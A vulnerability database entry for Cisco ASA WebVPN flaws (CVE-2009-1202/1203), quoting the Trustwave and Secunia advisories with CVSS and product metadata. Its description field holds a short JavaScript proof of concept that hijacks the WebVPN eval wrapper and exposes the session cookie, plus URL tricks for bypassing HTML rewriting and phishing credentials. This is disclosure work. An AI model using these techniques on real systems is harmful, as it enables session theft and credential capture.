var-200906-0069
Vulnerability from variot

WebVPN on the Cisco Adaptive Security Appliances (ASA) device with software 8.0(4), 8.1.2, and 8.2.1 allows remote attackers to bypass certain protection mechanisms involving URL rewriting and HTML rewriting, and conduct cross-site scripting (XSS) attacks, by modifying the first hex-encoded character in a /+CSCO+ URI, aka Bug ID CSCsy80705. Cisco ASA is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass HTML rewrite rules. Successfully exploiting this issue will aid in cross-site scripting attacks. This issue is documented by Cisco Bug ID CSCsy80705. Cisco ASA 8.0.(4), 8.1.2, and 8.2.1 are vulnerable. Trustwave's SpiderLabs Security Advisory TWSL2009-002: Cisco ASA Web VPN Multiple Vulnerabilities

Published: 2009-06-24 Version: 1.0

Vendor: Cisco Systems, Inc. (http://www.cisco.com)

Versions affected: 8.0(4), 8.1.2, and 8.2.1

Description: Cisco's Adaptive Security Appliance (ASA) provides a number of security related features, including "Web VPN" functionality that allows authenticated users to access a variety of content through a web interface. This includes other web content, FTP servers, and CIFS file servers.

The web content is proxied by the ASA and rewritten so that any URLs in the web content are passed as query parameters sent to the ASA web interface. Where scripting content is present, the ASA places a JavaScript wrapper around the original webpage's Document Object Model (DOM), to prevent the webpage from accessing the ASA's DOM. For example, the "csco_wrap_js" JavaScript function in /+CSCOL+/cte.js makes a call to a function referenced by "CSCO_WebVPN['process']". The result of this call is then used in an "eval" statement.

function csco_wrap_js(str) { var ret="

Vendor Response: This vulnerability has been corrected in versions 8.0.4.34, and 8.1.2.25.

CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C Base: 4.3 Temporal: 3.9

Finding 2: HTML Rewriting Bypass CVE: CVE-2009-1202 When a webpage is requested through the ASA's Web VPN, the targeted scheme and hostname is Rot13-encoded, then hex-encoded and placed in the ASA's URL. For example, "http://www.trustwave.com" is accessed by requesting the following ASA path:

/+CSCO+0075676763663A2F2F6A6A6A2E67656866676A6E69722E70627A+ +/

The HTML content of this request is obviously reformatted by the ASA, starting at the very beginning:

  <script id='CSCO_GHOST' src="/+webvpn+/toolbar.js">

However, if the request URL is modified to change the initial hex value of "00" to "01", the HTML document is returned without any rewriting. This allows the pages scriptable content to run in the ASA's DOM, making Cross-Site Scripting trivial.

Vendor Response: This vulnerability has been corrected in versions 8.0.4.34, and 8.1.2.25.

CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C Base: 4.3 Temporal: 3.9

Finding 3: Authentication Credential Theft CVE: CVE-2009-1203 When a user accesses an FTP or CIFS destination using the Web VPN, the resulting URL is formatted in a similar manner as the web requests described above. The following URL attempts to connect to ftp.example.com; normally, it would be in an HTML frame within the Web VPN website.

/+CSCOE+/files/browse.html?code=init&path=ftp%3A%2F%2F736763 2e726b6e7a6379722e70627a

The ASA first attempts to connect to the FTP server or CIFS share using anonymous credentials. If those fail, the user is prompted for login credentials. When viewed on its own (outside of a frame), the submission form gives no indication what it is for and is very similar in appearance to the Web VPN's primary login page. If the URL was sent to a user by an attacker, it is very possible that a user would assume that he needs to resubmit credentials to the Web VPN. The ASA would then forward the credentials to the attacker's FTP or CIFS server.

Vendor Response: This vulnerability has been corrected in versions 8.0.4.34, and 8.1.2.25.

CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C Base: 4.3 Temporal: 3.9

Vendor Communication Timeline: 03/31/09 - Cisco notified of vulnerabilities 06/24/09 - Cisco software updates released; Advisory released

Remediation Steps: Install updated software from Cisco.

Revision History: 1.0 Initial publication

About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com

About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs

Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . ----------------------------------------------------------------------

Do you have VARM strategy implemented?

(Vulnerability Assessment Remediation Management)

If not, then implement it through the most reliable vulnerability intelligence source on the market.

Implement it through Secunia.

For more information visit: http://secunia.com/advisories/business_solutions/

Alternatively request a call from a Secunia representative today to discuss how we can help you with our capabilities contact us at: sales@secunia.com

TITLE: Cisco ASA WebVPN Multiple Vulnerabilities

SECUNIA ADVISORY ID: SA35511

VERIFY ADVISORY: http://secunia.com/advisories/35511/

DESCRIPTION: Some vulnerabilities and a security issue have been reported in Cisco Adaptive Security Appliance (ASA), which can be exploited by malicious people to conduct cross-site scripting and spoofing attacks.

1) Input passed within web pages is not properly sanitised before being used in a call to eval() in context of the VPN web portal. This can be exploited to execute arbitrary HTML and script code in user's browser session in context of the WebVPN. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of the VPN web portal.

3) A security issue exists in the handling of Common Internet File System (CIFS) and FTP shares in the SSL VPN feature. This can be exploited to conduct spoofing attacks and potentially disclose the user's credentials if a user follows a specially crafted link.

The vulnerabilities are reported in versions prior to 8.0.4(34), 8.1.2(25), and 8.2.1(3) that are configured to accept Clientless SSL VPN connections.

SOLUTION: Update to version 8.0.4(34), 8.1.2(25), or 8.2.1(3). http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT

PROVIDED AND/OR DISCOVERED BY: David Byrne, Trustwave's SpiderLabs

ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/viewAlert.x?alertId=18373 http://tools.cisco.com/security/center/viewAlert.x?alertId=18442 http://tools.cisco.com/security/center/viewAlert.x?alertId=18536

Trustwave: https://www.trustwave.com/spiderlabs/advisories/TWSL2009-002.txt

About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.

Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

Show details on source website

To clipboard 

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200906-0069",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "adaptive security appliance",
        "scope": "eq",
        "trust": 2.7,
        "vendor": "cisco",
        "version": "8.2.1"
      },
      {
        "model": "adaptive security appliance",
        "scope": "eq",
        "trust": 2.7,
        "vendor": "cisco",
        "version": "8.1.2"
      },
      {
        "model": "adaptive security appliance",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "cisco",
        "version": "8.0\\(4\\)"
      },
      {
        "model": "adaptive security appliance",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "cisco",
        "version": "8.0(4)"
      },
      {
        "model": "adaptive security appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "*"
      },
      {
        "model": "adaptive security appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "adaptive security appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.2.13"
      },
      {
        "model": "adaptive security appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.1.2.25"
      },
      {
        "model": "adaptive security appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.0.4.34"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "35480"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1202"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:cisco:adaptive_security_appliance:8.2.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:cisco:adaptive_security_appliance:8.1.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:cisco:adaptive_security_appliance:8.0\\(4\\):*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:adaptive_security_appliance:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2009-1202"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "David Byrne  davidribyrne@yahoo.com",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2009-1202",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2009-1202",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-38648",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2009-1202",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200906-387",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-38648",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-38648"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1202"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "WebVPN on the Cisco Adaptive Security Appliances (ASA) device with software 8.0(4), 8.1.2, and 8.2.1 allows remote attackers to bypass certain protection mechanisms involving URL rewriting and HTML rewriting, and conduct cross-site scripting (XSS) attacks, by modifying the first hex-encoded character in a /+CSCO+ URI, aka Bug ID CSCsy80705. Cisco ASA is prone to a security-bypass vulnerability. \nAn attacker can exploit this issue to bypass HTML rewrite rules. Successfully exploiting this issue will aid in cross-site scripting attacks. \nThis issue is documented by Cisco Bug ID CSCsy80705. \nCisco ASA 8.0.(4), 8.1.2, and 8.2.1 are vulnerable. Trustwave\u0027s SpiderLabs Security Advisory TWSL2009-002: \nCisco ASA Web VPN Multiple Vulnerabilities\n\nPublished: 2009-06-24 Version: 1.0\n\nVendor: Cisco Systems, Inc. (http://www.cisco.com)\n\nVersions affected: 8.0(4), 8.1.2, and 8.2.1\n\nDescription: Cisco\u0027s Adaptive Security Appliance (ASA)\nprovides a number of security related features, including\n\"Web VPN\" functionality that allows authenticated users to\naccess a variety of content through a web interface. This\nincludes other web content, FTP servers, and CIFS file\nservers. \n\nThe web content is proxied by the ASA and rewritten so that\nany URLs in the web content are passed as query parameters\nsent to the ASA web interface. Where scripting content is\npresent, the ASA places a JavaScript wrapper around the\noriginal webpage\u0027s Document Object Model (DOM), to prevent\nthe webpage from accessing the ASA\u0027s DOM. For example, the\n\"csco_wrap_js\" JavaScript function in /+CSCOL+/cte.js makes\na call to a function referenced by \"CSCO_WebVPN[\u0027process\u0027]\". \nThe result of this call is then used in an \"eval\" statement. \n\nfunction csco_wrap_js(str)\n{\n   var ret=\"\u003cscript id=CSCO_GHOST src=\"+CSCO_Gateway+\n           \"/+CSCOL+/cte.js\u003e\u003c/scr\"+\n           \"ipt\u003e\u003cscript id=CSCO_GHOST src=\"+\n           CSCO_Gateway+\"/+CSCOE+/apcf\u003e\u003c/sc\"+\"ript\u003e\";\n   var js_mangled=CSCO_WebVPN[\u0027process\u0027](\u0027js\u0027,str);\n   ret+=CSCO_WebVPN[\u0027process\u0027](\u0027html\u0027,eval(js_mangled));\n   return ret;\n};\n\nTo exploit this behavior, a malicious page can rewrite\n\"CSCO_WebVPN[\u0027process\u0027]\" with an attacker-defined function\nthat will return an arbitrary value. The next time the\n\"csco_wrap_js\" function is called, the malicious code will\nbe executed. Below is a proof of concept. \n\n\u003chtml\u003e\u003cscript\u003e\nfunction a(b, c)\n{\n   return \"alert(\u0027Your VPN location:\\\\n\\\\n\u0027+\" +\n   \"document.location+\u0027\\\\n\\\\n\\\\n\\\\n\\\\n\" +\n   \"Your VPN cookie:\\\\n\\\\n\u0027+document.cookie);\";\n}\nCSCO_WebVPN[\u0027process\u0027] = a;\ncsco_wrap_js(\u0027\u0027);\n\u003c/script\u003e\u003c/html\u003e\n\nVendor Response:\nThis vulnerability has been corrected in versions 8.0.4.34,\nand 8.1.2.25. \n\nCVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C\nBase: 4.3\nTemporal: 3.9\n\n\nFinding 2: HTML Rewriting Bypass\nCVE: CVE-2009-1202\nWhen a webpage is requested through the ASA\u0027s Web VPN, the\ntargeted scheme and hostname is Rot13-encoded, then\nhex-encoded and placed in the ASA\u0027s URL. For example,\n\"http://www.trustwave.com\" is accessed by requesting the\nfollowing ASA path:\n      \n/+CSCO+0075676763663A2F2F6A6A6A2E67656866676A6E69722E70627A+\n+/\n\nThe HTML content of this request is obviously reformatted by\nthe ASA, starting at the very beginning:\n\n      \u003cscript id=\u0027CSCO_GHOST\u0027 src=\"/+webvpn+/toolbar.js\"\u003e\n\nHowever, if the request URL is modified to change the\ninitial hex value of \"00\" to \"01\", the HTML document is\nreturned without any rewriting. This allows the pages\nscriptable content to run in the ASA\u0027s DOM, making\nCross-Site Scripting trivial. \n\nVendor Response:\nThis vulnerability has been corrected in versions 8.0.4.34,\nand 8.1.2.25. \n\nCVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C\nBase: 4.3\nTemporal: 3.9\n\n\nFinding 3: Authentication Credential Theft\nCVE: CVE-2009-1203\nWhen a user accesses an FTP or CIFS destination using the\nWeb VPN, the resulting URL is formatted in a similar manner\nas the web requests described above. The following URL\nattempts to connect to ftp.example.com; normally, it would\nbe in an HTML frame within the Web VPN website. \n\n      \n/+CSCOE+/files/browse.html?code=init\u0026path=ftp%3A%2F%2F736763\n2e726b6e7a6379722e70627a\n\nThe ASA first attempts to connect to the FTP server or CIFS\nshare using anonymous credentials. If those fail, the user\nis prompted for login credentials. When viewed on its own\n(outside of a frame), the submission form gives no\nindication what it is for and is very similar in appearance\nto the Web VPN\u0027s primary login page. If the URL was sent to\na user by an attacker, it is very possible that a user would\nassume that he needs to resubmit credentials to the Web VPN. \nThe ASA would then forward the credentials to the attacker\u0027s\nFTP or CIFS server. \n\nVendor Response:\nThis vulnerability has been corrected in versions 8.0.4.34,\nand 8.1.2.25. \n\nCVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C\nBase: 4.3\nTemporal: 3.9\n\n\nVendor Communication Timeline:\n03/31/09 - Cisco notified of vulnerabilities\n06/24/09 - Cisco software updates released; Advisory\n           released\n\nRemediation Steps: Install updated software from Cisco. \n\n\nRevision History: 1.0 Initial publication\n\nAbout Trustwave:\nTrustwave is the leading provider of on-demand and\nsubscription-based information security and payment card\nindustry compliance management solutions to businesses and\ngovernment entities throughout the world. For organizations\nfaced with today\u0027s challenging data security and compliance\nenvironment, Trustwave provides a unique approach with\ncomprehensive solutions that include its flagship\nTrustKeeper compliance management software and other\nproprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500\nbusinesses and large financial institutions to small and\nmedium-sized retailers--manage compliance and secure their\nnetwork infrastructure, data communications and critical\ninformation assets. Trustwave is headquartered in Chicago\nwith offices throughout North America, South America,\nEurope, Africa, China and Australia. For more information,\nvisit https://www.trustwave.com\n\nAbout Trustwave\u0027s SpiderLabs:\nSpiderLabs is the advance security team at Trustwave\nresponsible for incident response and forensics, ethical\nhacking and application security tests for Trustwave\u0027s\nclients. SpiderLabs has responded to hundreds of security\nincidents, performed thousands of ethical hacking exercises\nand tested the security of hundreds of business applications\nfor Fortune 500 organizations. For more information visit\nhttps://www.trustwave.com/spiderlabs\n\nDisclaimer:\nThe information provided in this advisory is provided \"as\nis\" without warranty of any kind. Trustwave disclaims all\nwarranties, either express or implied, including the\nwarranties of merchantability and fitness for a particular\npurpose. In no event shall Trustwave or its suppliers be\nliable for any damages whatsoever including direct,\nindirect, incidental, consequential, loss of business\nprofits or special damages, even if Trustwave or its\nsuppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or\nlimitation of liability for consequential or incidental\ndamages so the foregoing limitation may not apply. \n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. ----------------------------------------------------------------------\n\nDo you have VARM strategy implemented?\n\n(Vulnerability Assessment Remediation Management)  \n\nIf not, then implement it through the most reliable vulnerability\nintelligence source on the market. \n\nImplement it through Secunia. \n\nFor more information visit:\nhttp://secunia.com/advisories/business_solutions/\n\nAlternatively request a call from a Secunia representative today to\ndiscuss how we can help you with our capabilities contact us at:\nsales@secunia.com\n\n----------------------------------------------------------------------\n\nTITLE:\nCisco ASA WebVPN Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA35511\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/35511/\n\nDESCRIPTION:\nSome vulnerabilities and a security issue have been reported in Cisco\nAdaptive Security Appliance (ASA), which can be exploited by malicious\npeople to conduct cross-site scripting and spoofing attacks. \n\n1) Input passed within web pages is not properly sanitised before\nbeing used in a call to eval() in context of the VPN web portal. This\ncan be exploited to execute arbitrary HTML and script code in user\u0027s\nbrowser session in context of the WebVPN. This can be\nexploited to execute arbitrary HTML and script code in a user\u0027s\nbrowser session in context of the VPN web portal. \n\n3) A security issue exists in the handling of Common Internet File\nSystem (CIFS) and FTP shares in the SSL VPN feature. This can be\nexploited to conduct spoofing attacks and potentially disclose the\nuser\u0027s credentials if a user follows a specially crafted link. \n\nThe vulnerabilities are reported in versions prior to 8.0.4(34),\n8.1.2(25), and 8.2.1(3) that are configured to accept Clientless SSL\nVPN connections. \n\nSOLUTION:\nUpdate to version 8.0.4(34), 8.1.2(25), or 8.2.1(3). \nhttp://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT\n\nPROVIDED AND/OR DISCOVERED BY:\nDavid Byrne, Trustwave\u0027s SpiderLabs\n\nORIGINAL ADVISORY:\nCisco:\nhttp://tools.cisco.com/security/center/viewAlert.x?alertId=18373\nhttp://tools.cisco.com/security/center/viewAlert.x?alertId=18442\nhttp://tools.cisco.com/security/center/viewAlert.x?alertId=18536\n\nTrustwave:\nhttps://www.trustwave.com/spiderlabs/advisories/TWSL2009-002.txt\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2009-1202"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      },
      {
        "db": "BID",
        "id": "35480"
      },
      {
        "db": "VULHUB",
        "id": "VHN-38648"
      },
      {
        "db": "PACKETSTORM",
        "id": "78639"
      },
      {
        "db": "PACKETSTORM",
        "id": "78856"
      }
    ],
    "trust": 2.16
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2009-1202",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "35480",
        "trust": 2.8
      },
      {
        "db": "SECUNIA",
        "id": "35511",
        "trust": 1.2
      },
      {
        "db": "SECTRACK",
        "id": "1022457",
        "trust": 1.1
      },
      {
        "db": "VUPEN",
        "id": "ADV-2009-1713",
        "trust": 1.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870",
        "trust": 0.8
      },
      {
        "db": "BUGTRAQ",
        "id": "20090624 TRUSTWAVE\u0027S SPIDERLABS SECURITY ADVISORY TWSL2009-002",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-387",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-38648",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "78639",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "78856",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-38648"
      },
      {
        "db": "BID",
        "id": "35480"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      },
      {
        "db": "PACKETSTORM",
        "id": "78639"
      },
      {
        "db": "PACKETSTORM",
        "id": "78856"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1202"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ]
  },
  "id": "VAR-200906-0069",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-38648"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T13:30:20.297000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "18442",
        "trust": 0.8,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=18442"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-38648"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1202"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.securityfocus.com/bid/35480"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/archive/1/504516/100/0/threaded"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id?1022457"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/35511"
      },
      {
        "trust": 1.1,
        "url": "http://www.vupen.com/english/advisories/2009/1713"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1202"
      },
      {
        "trust": 0.8,
